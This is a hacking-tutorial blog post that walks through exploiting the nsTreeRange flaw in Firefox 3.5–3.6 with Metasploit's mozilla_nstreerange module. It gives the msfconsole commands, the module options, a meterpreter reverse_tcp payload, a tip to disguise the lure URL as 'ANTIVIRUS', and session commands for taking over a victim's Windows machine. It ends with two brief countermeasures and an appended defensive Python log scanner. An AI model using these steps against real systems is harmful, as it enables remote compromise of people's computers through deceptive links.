Fi8sVrs

Hacking Mozilla Firefox 3.5 to 3.6 nsTreeRange Vulnerability Using Metasploit


Today while surfing I read some news about the nsTreeRange vulnerability in Mozilla Firefox versions 3.5 to 3.6.1.6. This vulnerability's ranking is not excellent or good; it's a normal-ranked vulnerability. It was made known on 2011-07-10 by sinn3r. In this tutorial I'm using Windows 7 as the victim operating system, with Mozilla Firefox v3.5.17. If you also want to try out this tutorial, you can find the Mozilla Firefox version I describe above at oldapps.com.

Requirements :

1. Metasploit Framework

2. Linux OS or Backtrack 5 (Metasploit is already included in this distro)

I. First, go to your msfconsole and use exploit/windows/browser/mozilla_nstreerange. If it reports that it cannot find the exploit, you may need to update your Metasploit Framework first by running msfupdate.


msf > use exploit/windows/browser/mozilla_nstreerange
msf exploit(mozilla_nstreerange) > show options

Module options (exploit/windows/browser/mozilla_nstreerange):

Name          Current Setting  Required  Description
----          ---------------  --------  -----------
CreateThread  true             yes       Whether to execute the payload in a new thread
SEHProlog     true             yes       Whether to prepend the payload with an SEH prolog, to catch crashes and enable a silent exit
SRVHOST       0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT       8080             yes       The local port to listen on.
SSL           false            no        Negotiate SSL for incoming connections
SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
SSLVersion    SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH                        no        The URI to use for this exploit (default is random)


Exploit target:

Id  Name
--  ----
0   Auto (Direct attack against Windows XP, otherwise through Java, if enabled)

II. There are a few options you should set before launching this exploit.

SRVHOST : Your IP address, which acts as the exploit server.

SRVPORT : The port used to serve requests from the victim. The default value is 8080, but if your port 80 is free, it's better to use port 80.

URIPATH : The path part of the URL, as in http://localhost/URIPATH. You can change this value to make the URIPATH more human-readable, e.g. http://localhost/ANTIVIRUS.

nsrteerange1.jpg

In the picture above I'm also using the meterpreter reverse_tcp payload, but you can choose the most suitable payload for you.

III. With everything set up correctly, run exploit to start our malicious web server.

nsrteerange2.jpg

IV. After the victim opens the malicious URL we have sent to them, our server processes the request and creates a new notepad.exe process on the victim's computer. Below is the screenshot.

nsrteerange3.jpg

V. A new session with ID 1 has been created. The next step is to interact with that session ID to gain privileges on the victim's computer.

sessions -i 1

nsrteerange4.jpg

That's it, we're already inside the victim's computer.

Countermeasure :

- Always update your Mozilla Firefox to the latest version.

- Use a personal firewall to detect inbound and outbound traffic.

Hope it's useful.

Hacking Mozilla Firefox 3.5 to 3.6 nsTreeRange Vulnerability Using Metasploit | Vishnu Valentino Hacking Tutorial, Tips and Trick
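
For the countermeasure side, an added example that is not part of the original post or of Metasploit: a Python check that scans proxy log records for clients still running the Firefox 3.5.x/3.6.x branches named in the title and marks requests to a bare IP address on a non-web port. The tab-separated log format, the function names and the sample records are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Firefox token in a User-Agent header, e.g. "Firefox/3.5.17"
FIREFOX_RE = re.compile(r"Firefox/(\d+(?:\.\d+)*)")
IP_HOST_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")

def firefox_version(user_agent):
    """Return the Firefox version as a tuple of ints, or None if not Firefox."""
    m = FIREFOX_RE.search(user_agent)
    return tuple(int(p) for p in m.group(1).split(".")) if m else None

def in_affected_branch(version):
    """True for the 3.5.x and 3.6.x branches named in the post title."""
    return version is not None and version[:2] in ((3, 5), (3, 6))

def review(log_lines):
    """Yield (client, version, url, reasons) for requests from affected browsers."""
    for line in log_lines:
        # Assumed record format: client_ip <TAB> url <TAB> user_agent
        client, url, agent = line.rstrip("\n").split("\t", 2)
        version = firefox_version(agent)
        if not in_affected_branch(version):
            continue
        reasons = ["outdated-firefox"]
        parts = urlsplit(url)
        # A bare IP address on a non-web port is unusual for ordinary browsing;
        # 8080 is the SRVPORT default in the module options listed in the post.
        if IP_HOST_RE.match(parts.hostname or "") and parts.port not in (None, 80, 443):
            reasons.append("ip-host-nonstandard-port")
        yield client, ".".join(map(str, version)), url, reasons

# Constructed sample records (not real traffic).
OLD_UA = "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.17) Gecko/20110123 Firefox/3.5.17"
NEW_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:115.0) Gecko/20100101 Firefox/115.0"
SAMPLE_LOG = [
    "10.0.0.21\thttp://intranet.example/wiki\t" + OLD_UA,
    "10.0.0.21\thttp://192.0.2.50:8080/ANTIVIRUS\t" + OLD_UA,
    "10.0.0.34\thttp://192.0.2.50:8080/ANTIVIRUS\t" + NEW_UA,
    "10.0.0.40\thttp://news.example/\tMozilla/5.0 (Windows NT 6.1) Chrome/100.0 Safari/537.36",
]

if __name__ == "__main__":
    for finding in review(SAMPLE_LOG):
        print(finding)
```

Clients reported with only "outdated-firefox" are update candidates; the second reason marks the requests worth reviewing first.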
